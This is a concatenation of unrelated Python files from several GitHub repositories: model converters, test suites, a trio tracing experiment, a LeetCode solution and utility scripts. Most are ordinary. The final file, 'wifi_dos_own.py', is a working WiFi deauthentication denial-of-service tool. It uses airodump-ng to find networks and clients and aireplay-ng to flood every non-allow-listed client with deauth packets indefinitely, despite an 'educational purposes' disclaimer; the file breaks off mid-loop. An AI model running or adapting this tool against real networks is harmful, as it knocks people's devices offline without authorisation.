dot_dotfiles/mail/dot_offlineimap.py | TheRealOne78/dots | 758 | 17543 | #! /usr/bin/env python2
# -*- coding: utf8 -*-
from subprocess import check_output
def get_pass():
return check_output("pass gmail/me", shell=True).strip("\n")
|
macro_benchmark/SSD_Tensorflow/caffe_to_tensorflow.py | songhappy/ai-matrix | 180 | 17578 | """Convert a Caffe model file to TensorFlow checkpoint format.
Assume that the network built is a equivalent (or a sub-) to the Caffe
definition.
"""
import tensorflow as tf
from nets import caffe_scope
from nets import nets_factory
slim = tf.contrib.slim
# =========================================================================== #
# Main flags.
# =========================================================================== #
tf.app.flags.DEFINE_string(
'model_name', 'ssd_300_vgg', 'Name of the model to convert.')
tf.app.flags.DEFINE_string(
'num_classes', 21, 'Number of classes in the dataset.')
tf.app.flags.DEFINE_string(
'caffemodel_path', None,
'The path to the Caffe model file to convert.')
FLAGS = tf.app.flags.FLAGS
# =========================================================================== #
# Main converting routine.
# =========================================================================== #
def main(_):
# Caffe scope...
caffemodel = caffe_scope.CaffeScope()
caffemodel.load(FLAGS.caffemodel_path)
tf.logging.set_verbosity(tf.logging.INFO)
with tf.Graph().as_default():
global_step = slim.create_global_step()
num_classes = int(FLAGS.num_classes)
# Select the network.
ssd_class = nets_factory.get_network(FLAGS.model_name)
ssd_params = ssd_class.default_params._replace(num_classes=num_classes)
ssd_net = ssd_class(ssd_params)
ssd_shape = ssd_net.params.img_shape
# Image placeholder and model.
shape = (1, ssd_shape[0], ssd_shape[1], 3)
img_input = tf.placeholder(shape=shape, dtype=tf.float32)
# Create model.
with slim.arg_scope(ssd_net.arg_scope_caffe(caffemodel)):
ssd_net.net(img_input, is_training=False)
init_op = tf.global_variables_initializer()
with tf.Session() as session:
# Run the init operation.
session.run(init_op)
# Save model in checkpoint.
saver = tf.train.Saver()
ckpt_path = FLAGS.caffemodel_path.replace('.caffemodel', '.ckpt')
saver.save(session, ckpt_path, write_meta_graph=False)
if __name__ == '__main__':
tf.app.run()
|
gwd/converters/spike2kaggle.py | kazakh-shai/kaggle-global-wheat-detection | 136 | 17590 | import argparse
import os.path as osp
from glob import glob
import cv2
import pandas as pd
from tqdm import tqdm
from gwd.converters import kaggle2coco
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--image-pattern", default="/data/SPIKE_images/*jpg")
parser.add_argument("--annotation-root", default="/data/SPIKE_annotations")
parser.add_argument("--kaggle_output_path", default="/data/spike.csv")
parser.add_argument("--coco_output_path", default="/data/coco_spike.json")
return parser.parse_args()
def main():
args = parse_args()
img_paths = glob(args.image_pattern)
annotations = []
for img_path in tqdm(img_paths):
ann_path = osp.join(args.annotation_root, (osp.basename(img_path.replace("jpg", "bboxes.tsv"))))
ann = pd.read_csv(ann_path, sep="\t", names=["x_min", "y_min", "x_max", "y_max"])
h, w = cv2.imread(img_path).shape[:2]
ann[["x_min", "x_max"]] = ann[["x_min", "x_max"]].clip(0, w)
ann[["y_min", "y_max"]] = ann[["y_min", "y_max"]].clip(0, h)
ann["height"] = h
ann["width"] = w
ann["bbox_width"] = ann["x_max"] - ann["x_min"]
ann["bbox_height"] = ann["y_max"] - ann["y_min"]
ann = ann[(ann["bbox_width"] > 0) & (ann["bbox_height"] > 0)].copy()
ann["bbox"] = ann[["x_min", "y_min", "bbox_width", "bbox_height"]].values.tolist()
ann["image_id"] = osp.basename(img_path).split(".")[0]
annotations.append(ann)
annotations = pd.concat(annotations)
annotations["source"] = "spike"
print(annotations.head())
annotations[["image_id", "source", "width", "height", "bbox"]].to_csv(args.kaggle_output_path, index=False)
kaggle2coco.main(args.kaggle_output_path, args.coco_output_path)
if __name__ == "__main__":
main()
|
emissary/controllers/load.py | LukeB42/Emissary | 193 | 17592 | <gh_stars>100-1000
# This file contains functions designed for
# loading cron tables and storing new feeds.
from emissary import db
from sqlalchemy import and_
from emissary.controllers.utils import spaceparse
from emissary.controllers.cron import parse_timings
from emissary.models import APIKey, Feed, FeedGroup
def create_feed(log, db, key, group, feed):
"""
Takes a key object, a group name and a dictionary
describing a feed ({name:,url:,schedule:,active:})
and reliably attaches a newly created feed to the key
and group.
"""
if not type(feed) == dict:
log('Unexpected type when creating feed for API key "%s"' % key.name)
return
for i in ['name', 'schedule', 'active', 'url']:
if not i in feed.keys():
log('%s: Error creating feed. Missing "%s" field from feed definition.' % (key.name, i))
return
f = Feed.query.filter(and_(Feed.key == key, Feed.name == feed['name'])).first()
fg = FeedGroup.query.filter(and_(FeedGroup.key == key, FeedGroup.name == group)).first()
if f:
if f.group:
log('%s: Error creating feed "%s" in group "%s", feed already exists in group "%s".' % \
(key.name, feed['name'], group, f.group.name))
return
elif fg:
log('%s: %s: Adding feed "%s"' % (key.name, fg.name, f.name))
fg.append(f)
db.session.add(fg)
db.session.add(f)
db.session.commit()
return
if not fg:
log('%s: Creating feed group %s.' % (key.name, group))
fg = FeedGroup(name=group)
key.feedgroups.append(fg)
try:
parse_timings(feed['schedule'])
except Exception, e:
log('%s: %s: Error creating "%s": %s' % \
(key.name, fg.name, feed['name'], e.message))
log('%s: %s: Creating feed "%s"' % (key.name, fg.name, feed['name']))
f = Feed(
name=feed['name'],
url=feed['url'],
active=feed['active'],
schedule=feed['schedule']
)
fg.feeds.append(f)
key.feeds.append(f)
db.session.add(key)
db.session.add(fg)
db.session.add(f)
db.session.commit()
def parse_crontab(filename):
"""
Get a file descriptor on filename and
create feeds and groups for API keys therein.
"""
def log(message):
print message
# read filename into a string named crontab
try:
fd = open(filename, "r")
except OSError:
print "Error opening %s" % filename
raise SystemExit
crontab = fd.read()
fd.close()
# keep a resident api key on hand
key = None
for i, line in enumerate(crontab.split('\n')):
# Set the APIKey we're working with when we find a line starting
# with apikey:
if line.startswith("apikey:"):
if ' ' in line:
key_str = line.split()[1]
key = APIKey.query.filter(APIKey.key == key_str).first()
if not key:
print 'Malformed or unknown API key at line %i in %s: %s' % (i+1, filename, line)
raise SystemExit
else:
print 'Using API key "%s".' % key.name
if line.startswith("http"):
feed = {'active': True}
# Grab the URL and set the string to the remainder
feed['url'] = line.split().pop(0)
line = ' '.join(line.split()[1:])
# Grab names and groups
names = spaceparse(line)
if not names:
print "Error parsing feed or group name at line %i in %s: %s" % (i+1, filename, line)
continue
feed['name'], group = names[:2]
# The schedule should be the last five items
schedule = line.split()[-5:]
try:
parse_timings(schedule)
except Exception, e:
print "Error parsing schedule at line %i in %s: %s" % (i+1, filename, e.message)
continue
feed['schedule'] = ' '.join(schedule)
create_feed(log, db, key, group, feed)
|
tests/test_utils/test_textio.py | hongxuenong/mmocr | 2,261 | 17605 | # Copyright (c) OpenMMLab. All rights reserved.
import tempfile
from mmocr.utils import list_from_file, list_to_file
lists = [
[],
[' '],
['\t'],
['a'],
[1],
[1.],
['a', 'b'],
['a', 1, 1.],
[1, 1., 'a'],
['啊', '啊啊'],
['選択', 'noël', 'Информацией', 'ÄÆä'],
]
def test_list_to_file():
with tempfile.TemporaryDirectory() as tmpdirname:
for i, lines in enumerate(lists):
filename = f'{tmpdirname}/{i}.txt'
list_to_file(filename, lines)
lines2 = [
line.rstrip('\r\n')
for line in open(filename, 'r', encoding='utf-8').readlines()
]
lines = list(map(str, lines))
assert len(lines) == len(lines2)
assert all(line1 == line2 for line1, line2 in zip(lines, lines2))
def test_list_from_file():
with tempfile.TemporaryDirectory() as tmpdirname:
for encoding in ['utf-8', 'utf-8-sig']:
for lineend in ['\n', '\r\n']:
for i, lines in enumerate(lists):
filename = f'{tmpdirname}/{i}.txt'
with open(filename, 'w', encoding=encoding) as f:
f.writelines(f'{line}{lineend}' for line in lines)
lines2 = list_from_file(filename, encoding=encoding)
lines = list(map(str, lines))
assert len(lines) == len(lines2)
assert all(line1 == line2
for line1, line2 in zip(lines, lines2))
|
notes-to-self/trace.py | guilledk/trio | 4,681 | 17617 | import trio
import os
import json
from itertools import count
# Experiment with generating Chrome Event Trace format, which can be browsed
# through chrome://tracing or other mechanisms.
#
# Screenshot: https://files.gitter.im/python-trio/general/fp6w/image.png
#
# Trace format docs: https://docs.google.com/document/d/1CvAClvFfyA5R-PhYUmn5OOQtYMH4h6I0nSsKchNAySU/preview#
#
# Things learned so far:
# - I don't understand how the ph="s"/ph="f" flow events work – I think
# they're supposed to show up as arrows, and I'm emitting them between tasks
# that wake each other up, but they're not showing up.
# - I think writing out json synchronously from each event is creating gaps in
# the trace; maybe better to batch them up to write up all at once at the
# end
# - including tracebacks would be cool
# - there doesn't seem to be any good way to group together tasks based on
# nurseries. this really limits the value of this particular trace
# format+viewer for us. (also maybe we should have an instrumentation event
# when a nursery is opened/closed?)
# - task._counter should maybe be public
# - I don't know how to best show task lifetime, scheduling times, and what
# the task is actually doing on the same plot. if we want to show particular
# events like "called stream.send_all", then the chrome trace format won't
# let us also show "task is running", because neither kind of event is
# strictly nested inside the other
class Trace(trio.abc.Instrument):
def __init__(self, out):
self.out = out
self.out.write("[\n")
self.ids = count()
self._task_metadata(-1, "I/O manager")
def _write(self, **ev):
ev.setdefault("pid", os.getpid())
if ev["ph"] != "M":
ev.setdefault("ts", trio.current_time() * 1e6)
self.out.write(json.dumps(ev))
self.out.write(",\n")
def _task_metadata(self, tid, name):
self._write(
name="thread_name",
ph="M",
tid=tid,
args={"name": name},
)
self._write(
name="thread_sort_index",
ph="M",
tid=tid,
args={"sort_index": tid},
)
def task_spawned(self, task):
self._task_metadata(task._counter, task.name)
self._write(
name="task lifetime",
ph="B",
tid=task._counter,
)
def task_exited(self, task):
self._write(
name="task lifetime",
ph="E",
tid=task._counter,
)
def before_task_step(self, task):
self._write(
name="running",
ph="B",
tid=task._counter,
)
def after_task_step(self, task):
self._write(
name="running",
ph="E",
tid=task._counter,
)
def task_scheduled(self, task):
try:
waker = trio.lowlevel.current_task()
except RuntimeError:
pass
else:
id = next(self.ids)
self._write(
ph="s",
cat="wakeup",
id=id,
tid=waker._counter,
)
self._write(
cat="wakeup",
ph="f",
id=id,
tid=task._counter,
)
def before_io_wait(self, timeout):
self._write(
name=f"I/O wait",
ph="B",
tid=-1,
)
def after_io_wait(self, timeout):
self._write(
name=f"I/O wait",
ph="E",
tid=-1,
)
async def child1():
print(" child1: started! sleeping now...")
await trio.sleep(1)
print(" child1: exiting!")
async def child2():
print(" child2: started! sleeping now...")
await trio.sleep(1)
print(" child2: exiting!")
async def parent():
print("parent: started!")
async with trio.open_nursery() as nursery:
print("parent: spawning child1...")
nursery.start_soon(child1)
print("parent: spawning child2...")
nursery.start_soon(child2)
print("parent: waiting for children to finish...")
# -- we exit the nursery block here --
print("parent: all done!")
t = Trace(open("/tmp/t.json", "w"))
trio.run(parent, instruments=[t])
|
python/array/leetcode/move_zero.py | googege/algo-learn | 153 | 17624 | <reponame>googege/algo-learn<filename>python/array/leetcode/move_zero.py
from typing import List
# 移动零
class Solution:
# 新开一个数组
def moveZeroes1(self, nums: List[int]) -> None:
temp, k = [0] * len(nums), 0
for n in nums:
if n != 0:
temp[k] = n
k += 1
nums[:] = temp[:]
# 双指针解法
def moveZeroes2(self, nums: List[int]) -> None:
k = 0
for i, v in enumerate(nums):
if v != 0:
nums[i], nums[k] = nums[k], nums[i]
k += 1
|
tests/tests_main.py | insilications/tqdm-clr | 22,617 | 17629 | <filename>tests/tests_main.py
"""Test CLI usage."""
import logging
import subprocess # nosec
import sys
from functools import wraps
from os import linesep
from tqdm.cli import TqdmKeyError, TqdmTypeError, main
from tqdm.utils import IS_WIN
from .tests_tqdm import BytesIO, _range, closing, mark, raises
def restore_sys(func):
"""Decorates `func(capsysbin)` to save & restore `sys.(stdin|argv)`."""
@wraps(func)
def inner(capsysbin):
"""function requiring capsysbin which may alter `sys.(stdin|argv)`"""
_SYS = sys.stdin, sys.argv
try:
res = func(capsysbin)
finally:
sys.stdin, sys.argv = _SYS
return res
return inner
def norm(bytestr):
"""Normalise line endings."""
return bytestr if linesep == "\n" else bytestr.replace(linesep.encode(), b"\n")
@mark.slow
def test_pipes():
"""Test command line pipes"""
ls_out = subprocess.check_output(['ls']) # nosec
ls = subprocess.Popen(['ls'], stdout=subprocess.PIPE) # nosec
res = subprocess.Popen( # nosec
[sys.executable, '-c', 'from tqdm.cli import main; main()'],
stdin=ls.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = res.communicate()
assert ls.poll() == 0
# actual test:
assert norm(ls_out) == norm(out)
assert b"it/s" in err
if sys.version_info[:2] >= (3, 8):
test_pipes = mark.filterwarnings("ignore:unclosed file:ResourceWarning")(
test_pipes)
def test_main_import():
"""Test main CLI import"""
N = 123
_SYS = sys.stdin, sys.argv
# test direct import
sys.stdin = [str(i).encode() for i in _range(N)]
sys.argv = ['', '--desc', 'Test CLI import',
'--ascii', 'True', '--unit_scale', 'True']
try:
import tqdm.__main__ # NOQA, pylint: disable=unused-variable
finally:
sys.stdin, sys.argv = _SYS
@restore_sys
def test_main_bytes(capsysbin):
"""Test CLI --bytes"""
N = 123
# test --delim
IN_DATA = '\0'.join(map(str, _range(N))).encode()
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA)
# sys.stdin.write(b'\xff') # TODO
sys.stdin.seek(0)
main(sys.stderr, ['--desc', 'Test CLI delim', '--ascii', 'True',
'--delim', r'\0', '--buf_size', '64'])
out, err = capsysbin.readouterr()
assert out == IN_DATA
assert str(N) + "it" in err.decode("U8")
# test --bytes
IN_DATA = IN_DATA.replace(b'\0', b'\n')
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA)
sys.stdin.seek(0)
main(sys.stderr, ['--ascii', '--bytes=True', '--unit_scale', 'False'])
out, err = capsysbin.readouterr()
assert out == IN_DATA
assert str(len(IN_DATA)) + "B" in err.decode("U8")
@mark.skipif(sys.version_info[0] == 2, reason="no caplog on py2")
def test_main_log(capsysbin, caplog):
"""Test CLI --log"""
_SYS = sys.stdin, sys.argv
N = 123
sys.stdin = [(str(i) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
try:
with caplog.at_level(logging.INFO):
main(sys.stderr, ['--log', 'INFO'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert not caplog.record_tuples
with caplog.at_level(logging.DEBUG):
main(sys.stderr, ['--log', 'DEBUG'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert caplog.record_tuples
finally:
sys.stdin, sys.argv = _SYS
@restore_sys
def test_main(capsysbin):
"""Test misc CLI options"""
N = 123
sys.stdin = [(str(i) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
# test --tee
main(sys.stderr, ['--mininterval', '0', '--miniters', '1'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert N <= len(err.split(b"\r")) < N + 5
len_err = len(err)
main(sys.stderr, ['--tee', '--mininterval', '0', '--miniters', '1'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
# spaces to clear intermediate lines could increase length
assert len_err + len(norm(out)) <= len(err)
# test --null
main(sys.stderr, ['--null'])
out, err = capsysbin.readouterr()
assert not out and b"123/123" in err
# test integer --update
main(sys.stderr, ['--update'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str(N // 2 * N) + "it").encode() in err, "expected arithmetic sum formula"
# test integer --update_to
main(sys.stderr, ['--update-to'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str(N - 1) + "it").encode() in err
assert (str(N) + "it").encode() not in err
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA.replace(b'\n', b'D'))
# test integer --update --delim
sys.stdin.seek(0)
main(sys.stderr, ['--update', '--delim', 'D'])
out, err = capsysbin.readouterr()
assert out == IN_DATA.replace(b'\n', b'D')
assert (str(N // 2 * N) + "it").encode() in err, "expected arithmetic sum"
# test integer --update_to --delim
sys.stdin.seek(0)
main(sys.stderr, ['--update-to', '--delim', 'D'])
out, err = capsysbin.readouterr()
assert out == IN_DATA.replace(b'\n', b'D')
assert (str(N - 1) + "it").encode() in err
assert (str(N) + "it").encode() not in err
# test float --update_to
sys.stdin = [(str(i / 2.0) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
main(sys.stderr, ['--update-to'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str((N - 1) / 2.0) + "it").encode() in err
assert (str(N / 2.0) + "it").encode() not in err
@mark.slow
@mark.skipif(IS_WIN, reason="no manpages on windows")
def test_manpath(tmp_path):
"""Test CLI --manpath"""
man = tmp_path / "tqdm.1"
assert not man.exists()
with raises(SystemExit):
main(argv=['--manpath', str(tmp_path)])
assert man.is_file()
@mark.slow
@mark.skipif(IS_WIN, reason="no completion on windows")
def test_comppath(tmp_path):
"""Test CLI --comppath"""
man = tmp_path / "tqdm_completion.sh"
assert not man.exists()
with raises(SystemExit):
main(argv=['--comppath', str(tmp_path)])
assert man.is_file()
# check most important options appear
script = man.read_text()
opts = {'--help', '--desc', '--total', '--leave', '--ncols', '--ascii',
'--dynamic_ncols', '--position', '--bytes', '--nrows', '--delim',
'--manpath', '--comppath'}
assert all(args in script for args in opts)
@restore_sys
def test_exceptions(capsysbin):
"""Test CLI Exceptions"""
N = 123
sys.stdin = [str(i) + '\n' for i in _range(N)]
IN_DATA = ''.join(sys.stdin).encode()
with raises(TqdmKeyError, match="bad_arg_u_ment"):
main(sys.stderr, argv=['-ascii', '-unit_scale', '--bad_arg_u_ment', 'foo'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmTypeError, match="invalid_bool_value"):
main(sys.stderr, argv=['-ascii', '-unit_scale', 'invalid_bool_value'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmTypeError, match="invalid_int_value"):
main(sys.stderr, argv=['-ascii', '--total', 'invalid_int_value'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmKeyError, match="Can only have one of --"):
main(sys.stderr, argv=['--update', '--update_to'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
# test SystemExits
for i in ('-h', '--help', '-v', '--version'):
with raises(SystemExit):
main(argv=[i])
|
tools/replace_version.py | jasmcaus/image-deep-learning-keras | 681 | 17632 | import os
def replace_version(old_version, new_version):
if not isinstance(old_version, tuple) or not isinstance(new_version, tuple):
raise ValueError("`old_version` and `new_version` must be a version tuple. Eg: (1.2.3)")
major, minor, micro = old_version[:3]
old_version = f'{major}.{minor}.{micro}'
major, minor, micro = new_version[:3]
new_version = f'{major}.{minor}.{micro}'
print(f"New version = {new_version}")
for root, _, files in os.walk('../caer'):
for file in files:
if file.endswith(('.py', '.cpp', '.c', '.h', '.hpp')):
with open(os.path.abspath(os.path.join(root, file)), 'r') as f:
new_text = f.read().replace('version ' + old_version, 'version ' + new_version)
with open(os.path.abspath(os.path.join(root, file)), 'w') as f:
print(os.path.abspath(os.path.join(root, file)))
f.write(new_text)
replace_version((1,8,0), (3,9,1))
|
wifi_dos_own.py | Mr-Cracker-Pro/red-python-scripts | 1,353 | 17694 | <filename>wifi_dos_own.py
#!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
#!/usr/bin/python3
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
# We use the subprocess.run to run the "sudo iw dev" command we'd normally run to find the network interfaces.
result = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
"""This function needs the network interface controller name to put it into monitor mode.
Argument: Network Controller Name"""
# Put WiFi controller into monitor mode.
# This is one way to put it into monitoring mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Killing conflicting processes makes sure that nothing interferes with putting controller into monitor mode.
subprocess.run(["airmon-ng", "check", "kill"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iw", wifi_name, "set", "monitor", "none"])
# Bring the WiFi controller back online.
subprocess.run(["ip", "link", "set", wifi_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
# Bands b and g are 2.4Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif choice == "1":
# Band a is for 5Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
# Will use bands a, b and g (actually band n). Checks full spectrum.
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We copy any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
"""SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
ARGUMENTS: wifi interface name
"""
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
def get_clients(hackbssid, hackchannel, wifi_name):
subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
# We are using aireplay-ng to send a deauth packet. 0 means it will send it indefinitely. -a is used to specify the MAC address of the target router. -c is used to specify the mac we want to send the deauth packet.
# Then we also need to specify the interface
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
# Regular Expressions to be used.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of <NAME>, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
# Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
macs_not_to_kick_off = mac_address_regex.findall(macs)
# We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
# If you entered a valid MAC Address the program flow will continue and break out of the while loop.
if len(macs_not_to_kick_off) > 0:
break
print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
# Check if the choice exists. If it doesn't it asks the user to try again.
# We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
band_choice = input("Please select the bands you want to scan from the list above: ")
try:
if wifi_controller_bands[int(band_choice)]:
# Since the choice exists and is an integer we can cast band choice as an integer.
band_choice = int(band_choice)
break
except:
print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
# If no networks interface controllers connected to your computer the program will exit.
print("Please connect a network interface controller and try again!")
exit()
# Select the network interface controller you want to put into monitor mode.
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
try:
if network_controllers[int(controller_choice)]:
break
except:
print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
set_monitor_mode(wifi_name)
# Monitor the selected wifi band(s).
set_band_to_monitor(band_choice)
# Print WiFi Menu
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
get_clients(hackbssid, hackchannel, wifi_name)
# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
while True:
count = 0
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
print("Running")
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
pass
# We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
elif row["Station MAC"] in macs_not_to_kick_off:
pass
else:
# Add all the active MAC Addresses.
active_clients.add(row["Station MAC"])
print("Station MAC |")
print("______________________|")
for item in active_clients:
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{item}")
# Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
if item not in threads_started:
# It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
threads_started.append(item)
